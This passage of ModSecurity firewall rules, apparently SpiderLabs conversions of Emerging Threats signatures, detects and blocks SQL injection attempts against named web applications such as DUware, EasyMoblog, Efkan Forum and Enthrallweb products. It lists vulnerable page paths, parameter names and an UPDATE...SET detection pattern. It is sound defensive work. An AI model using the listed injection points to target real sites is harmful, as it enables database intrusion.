"chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2006699,rev:6,msg:'SLR: ET WEB_SPECIFIC_APPS DUware DUdownload SQL Injection Attempt -- detail.asp action UPDATE',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/21405'" SecRule &TX:'/SQL_INJECTION.*ARGS:action/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS DUware DUdownload SQL Injection Attempt -- detail.asp action UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2006705) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS DUware DUpaypal SQL Injection Attempt -- detail.asp iType UPDATE SecRule REQUEST_LINE "@contains /detail.asp" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2006705,rev:6,msg:'SLR: ET WEB_SPECIFIC_APPS DUware DUpaypal SQL Injection Attempt -- detail.asp iType UPDATE',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/14034'" SecRule &TX:'/SQL_INJECTION.*ARGS:iType/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS DUware DUpaypal SQL Injection Attempt -- detail.asp iType UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2006711) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS DuWare DuClassmate SQL Injection Attempt -- default.asp iCity UPDATE SecRule REQUEST_LINE "@contains /default.asp" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2006711,rev:6,msg:'SLR: ET WEB_SPECIFIC_APPS DuWare DuClassmate SQL Injection Attempt -- default.asp iCity UPDATE',tag:'web-application-attack',tag:'url,www.securityfocus.com/archive/1/archive/1/453318/100/0/threaded'" SecRule &TX:'/SQL_INJECTION.*ARGS:iCity/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS DuWare DuClassmate SQL Injection Attempt -- default.asp iCity UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2006717) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS DuWare DuNews SQL Injection Attempt -- detail.asp iNews UPDATE SecRule REQUEST_LINE "@contains /detail.asp" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2006717,rev:6,msg:'SLR: ET WEB_SPECIFIC_APPS DuWare DuNews SQL Injection Attempt -- detail.asp iNews UPDATE',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/15681'" SecRule &TX:'/SQL_INJECTION.*ARGS:iNews/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS DuWare DuNews SQL Injection Attempt -- detail.asp iNews UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2003775) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS E-Annu SQL Injection Attempt -- home.php a UPDATE SecRule REQUEST_LINE "@contains /home.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2003775,rev:6,msg:'SLR: ET WEB_SPECIFIC_APPS E-Annu SQL Injection Attempt -- home.php a UPDATE',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/23727'" SecRule &TX:'/SQL_INJECTION.*ARGS:a/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS E-Annu SQL Injection Attempt -- home.php a UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2004629) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS EQdkp SQL Injection Attempt -- listmembers.php rank UPDATE SecRule REQUEST_LINE "@contains /listmembers.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2004629,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS EQdkp SQL Injection Attempt -- listmembers.php rank UPDATE',tag:'web-application-attack',tag:'url,www.milw0rm.com/exploits/4030'" SecRule &TX:'/SQL_INJECTION.*ARGS:rank/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS EQdkp SQL Injection Attempt -- listmembers.php rank UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2005273) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Easebay Resources Paypal Subscription Manager SQL Injection Attempt -- memberlist.php keyword UPDATE SecRule REQUEST_LINE "@contains /admin/memberlist.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2005273,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS Easebay Resources Paypal Subscription Manager SQL Injection Attempt -- memberlist.php keyword UPDATE',tag:'web-application-attack',tag:'url,www.securityfocus.com/archive/1/archive/1/457506/100/0/threaded'" SecRule &TX:'/SQL_INJECTION.*ARGS:keyword/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Easebay Resources Paypal Subscription Manager SQL Injection Attempt -- memberlist.php keyword UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2005279) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Easebay Resources Login Manager SQL Injection Attempt -- memberlist.php init_row UPDATE SecRule REQUEST_LINE "@contains /admin/memberlist.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2005279,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS Easebay Resources Login Manager SQL Injection Attempt -- memberlist.php init_row UPDATE',tag:'web-application-attack',tag:'url,www.securityfocus.com/archive/1/archive/1/457505/100/0/threaded'" SecRule &TX:'/SQL_INJECTION.*ARGS:init_row/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Easebay Resources Login Manager SQL Injection Attempt -- memberlist.php init_row UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2005045) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS EasyMoblog SQL Injection Attempt -- add_comment.php i UPDATE SecRule REQUEST_LINE "@contains /add_comment.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2005045,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS EasyMoblog SQL Injection Attempt -- add_comment.php i UPDATE',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/22369'" SecRule &TX:'/SQL_INJECTION.*ARGS:i/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS EasyMoblog SQL Injection Attempt -- add_comment.php i UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2005050) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS EasyMoblog SQL Injection Attempt -- add_comment.php post_id UPDATE SecRule REQUEST_LINE "@contains /add_comment.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2005050,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS EasyMoblog SQL Injection Attempt -- add_comment.php post_id UPDATE',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/22369'" SecRule &TX:'/SQL_INJECTION.*ARGS:post_id/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS EasyMoblog SQL Injection Attempt -- add_comment.php post_id UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2005056) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS EasyMoblog SQL Injection Attempt -- list_comments.php i UPDATE SecRule REQUEST_LINE "@contains /list_comments.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2005056,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS EasyMoblog SQL Injection Attempt -- list_comments.php i UPDATE',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/22369'" SecRule &TX:'/SQL_INJECTION.*ARGS:i/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS EasyMoblog SQL Injection Attempt -- list_comments.php i UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2006559) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS EasyPage SQL Injection Attempt -- default.aspx docId UPDATE SecRule REQUEST_LINE "@contains /sptrees/default.aspx" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2006559,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS EasyPage SQL Injection Attempt -- default.aspx docId UPDATE',tag:'web-application-attack',tag:'url,www.securityfocus.com/archive/1/archive/1/453586/100/100/threaded'" SecRule &TX:'/SQL_INJECTION.*ARGS:docId/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS EasyPage SQL Injection Attempt -- default.aspx docId UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2005092) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Eclectic Designs CascadianFAQ SQL Injection Attempt -- index.php qid UPDATE SecRule REQUEST_LINE "@contains /index.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2005092,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS Eclectic Designs CascadianFAQ SQL Injection Attempt -- index.php qid UPDATE',tag:'web-application-attack',tag:'url,www.frsirt.com/english/advisories/2007/0424'" SecRule &TX:'/SQL_INJECTION.*ARGS:qid/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Eclectic Designs CascadianFAQ SQL Injection Attempt -- index.php qid UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2005116) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Eclectic Designs CascadianFAQ SQL Injection Attempt -- index.php catid UPDATE SecRule REQUEST_LINE "@contains /index.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2005116,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS Eclectic Designs CascadianFAQ SQL Injection Attempt -- index.php catid UPDATE',tag:'web-application-attack',tag:'url,www.milw0rm.com/exploits/3227'" SecRule &TX:'/SQL_INJECTION.*ARGS:catid/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Eclectic Designs CascadianFAQ SQL Injection Attempt -- index.php catid UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2005990) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Efkan Forum SQL Injection Attempt -- admin.asp grup UPDATE SecRule REQUEST_LINE "@contains /admin.asp" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2005990,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS Efkan Forum SQL Injection Attempt -- admin.asp grup UPDATE',tag:'web-application-attack',tag:'url,www.frsirt.com/english/advisories/2006/5150'" SecRule &TX:'/SQL_INJECTION.*ARGS:grup/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Efkan Forum SQL Injection Attempt -- admin.asp grup UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2005996) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Efkan Forum SQL Injection Attempt -- default.asp id UPDATE SecRule REQUEST_LINE "@contains /default.asp" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2005996,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS Efkan Forum SQL Injection Attempt -- default.asp id UPDATE',tag:'web-application-attack',tag:'url,www.frsirt.com/english/advisories/2006/5150'" SecRule &TX:'/SQL_INJECTION.*ARGS:id/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Efkan Forum SQL Injection Attempt -- default.asp id UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2006002) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Efkan Forum SQL Injection Attempt -- admin.asp id UPDATE SecRule REQUEST_LINE "@contains /admin.asp" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2006002,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS Efkan Forum SQL Injection Attempt -- admin.asp id UPDATE',tag:'web-application-attack',tag:'url,www.frsirt.com/english/advisories/2006/5150'" SecRule &TX:'/SQL_INJECTION.*ARGS:id/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Efkan Forum SQL Injection Attempt -- admin.asp id UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2006164) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Efkan Forum SQL Injection Attempt -- default.asp grup UPDATE SecRule REQUEST_LINE "@contains /default.asp" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2006164,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS Efkan Forum SQL Injection Attempt -- default.asp grup UPDATE',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/21726'" SecRule &TX:'/SQL_INJECTION.*ARGS:grup/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Efkan Forum SQL Injection Attempt -- default.asp grup UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2006454) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Elxis CMS SQL Injection Attempt -- mod_banners.php UPDATE SecRule REQUEST_LINE "@contains /mod_banners.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2006454,rev:6,msg:'SLR: ET WEB_SPECIFIC_APPS Elxis CMS SQL Injection Attempt -- mod_banners.php UPDATE',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/24478'" SecRule QUERY_STRING|REQUEST_BODY "(?i:UPDATE.+SET)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Elxis CMS SQL Injection Attempt -- mod_banners.php UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2006140) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Enthrallweb eMates SQL Injection Attempt -- newsdetail.asp ID UPDATE SecRule REQUEST_LINE "@contains /newsdetail.asp" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2006140,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS Enthrallweb eMates SQL Injection Attempt -- newsdetail.asp ID UPDATE',tag:'web-application-attack',tag:'url,www.milw0rm.com/exploits/2990'" SecRule &TX:'/SQL_INJECTION.*ARGS:ID/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Enthrallweb eMates SQL Injection Attempt -- newsdetail.asp ID UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2006152) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Enthrallweb eCars SQL Injection Attempt -- Types.asp Type_id UPDATE SecRule REQUEST_LINE "@contains /Types.asp" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2006152,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS Enthrallweb eCars SQL Injection Attempt -- Types.asp Type_id UPDATE',tag:'web-application-attack',tag:'url,www.milw0rm.com/exploits/2989'" SecRule &TX:'/SQL_INJECTION.*ARGS:Type_id/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Enthrallweb eCars SQL Injection Attempt -- Types.asp Type_id UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2006158) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Enthrallweb ePages SQL Injection Attempt -- actualpic.asp Biz_ID UPDATE SecRule REQUEST_LINE "@contains /actualpic.asp" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2006158,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS Enthrallweb ePages SQL Injection Attempt -- actualpic.asp Biz_ID UPDATE',tag:'web-application-attack',tag:'url,www.milw0rm.com/exploits/2991'" SecRule &TX:'/SQL_INJECTION.*ARGS:Biz_ID/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Enthrallweb ePages SQL Injection Attempt -- actualpic.asp Biz_ID UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2007047) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Enthrallweb eClassifieds SQL Injection Attempt -- ad.asp AD_ID UPDATE SecRule REQUEST_LINE "@contains /ad.asp" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2007047,rev:6,msg:'SLR: ET WEB_SPECIFIC_APPS Enthrallweb eClassifieds SQL Injection Attempt -- ad.asp AD_ID UPDATE',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/21192'" SecRule &TX:'/SQL_INJECTION.*ARGS:AD_ID/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Enthrallweb eClassifieds SQL Injection Attempt -- ad.asp AD_ID UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2007053) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Enthrallweb eClassifieds SQL Injection Attempt -- ad.asp cat_id UPDATE SecRule REQUEST_LINE "@contains /ad.asp" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2007053,rev:6,msg:'SLR: ET WEB_SPECIFIC_APPS Enthrallweb eClassifieds SQL Injection Attempt -- ad.asp cat_id UPDATE',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/21192'" SecRule &TX:'/SQL_INJECTION.*ARGS:cat_id/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Enthrallweb eClassifieds SQL Injection Attempt -- ad.asp cat_id UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2007049) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Enthrallweb eClassifieds SQL Injection Attempt -- ad.asp sub_id UPDATE SecRule REQUEST_LINE "@contains /ad.asp" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2007049,rev:6,msg:'SLR: ET WEB_SPECIFIC_APPS Enthrallweb eClassifieds SQL Injection Attempt -- ad.asp sub_id UPDATE',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/21192'" SecRule &TX:'/SQL_INJECTION.*ARGS:sub_id/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Enthrallweb eClassifieds SQL Injection Attempt -- ad.asp sub_id UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2007035) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Enthrallweb eClassifieds SQL Injection Attempt -- dircat.asp cid UPDATE SecRule REQUEST_LINE "@contains /dircat.asp" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2007035,rev:6,msg:'SLR: ET WEB_SPECIFIC_APPS Enthrallweb eClassifieds SQL Injection Attempt -- dircat.asp cid UPDATE',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/21192'" SecRule &TX:'/SQL_INJECTION.*ARGS:cid/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Enthrallweb eClassifieds SQL Injection Attempt -- dircat.asp cid UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2007041) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Enthrallweb eClassifieds SQL Injection Attempt -- dirSub.asp sid UPDATE SecRule REQUEST_LINE "@contains /dirSub.asp" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2007041,rev:6,msg:'SLR: ET WEB_SPECIFIC_APPS Enthrallweb eClassifieds SQL Injection Attempt -- dirSub.asp sid UPDATE',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/21192'" SecRule &TX:'/SQL_INJECTION.*ARGS:sid/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Enthrallweb eClassifieds SQL Injection Attempt -- dirSub.asp sid UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2007081) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Enthrallweb eHomes SQL Injection Attempt -- dircat.asp cid UPDATE SecRule REQUEST_LINE "@contains /dircat.asp" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2007081,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS Enthrallweb eHomes SQL Injection Attempt -- dircat.asp cid UPDATE',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/21193'" SecRule &TX:'/SQL_INJECTION.*ARGS:cid/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Enthrallweb eHomes SQL Injection Attempt -- dircat.asp cid UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2007087) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Enthrallweb eHomes SQL Injection Attempt -- dirSub.asp sid UPDATE SecRule REQUEST_LINE "@contains /dirSub.asp" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2007087,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS Enthrallweb eHomes SQL Injection Attempt -- dirSub.asp sid UPDATE',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/21193'" SecRule &TX:'/SQL_INJECTION.*ARGS:sid/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Enthrallweb eHomes SQL Injection Attempt -- dirSub.asp sid UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2007093) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Enthrallweb eHomes SQL Injection Attempt -- types.asp TYPE_ID UPDATE SecRule REQUEST_LINE "@contains /types.asp" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2007093,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS Enthrallweb eHomes SQL Injection Attempt -- types.asp TYPE_ID UPDATE',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/21193'" SecRule &TX:'/SQL_INJECTION.*ARGS:TYPE_ID/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Enthrallweb eHomes SQL Injection Attempt -- types.asp TYPE_ID UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2007099) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Enthrallweb eHomes SQL Injection Attempt -- homeDetail.asp AD_ID UPDATE SecRule REQUEST_LINE "@contains /homeDetail.asp" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2007099,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS Enthrallweb eHomes SQL Injection Attempt -- homeDetail.asp AD_ID UPDATE',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/21193'" SecRule &TX:'/SQL_INJECTION.*ARGS:AD_ID/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Enthrallweb eHomes SQL Injection Attempt -- homeDetail.asp AD_ID UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2007105) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Enthrallweb eHomes SQL Injection Attempt -- result.asp cat UPDATE SecRule REQUEST_LINE "@contains /result.asp" 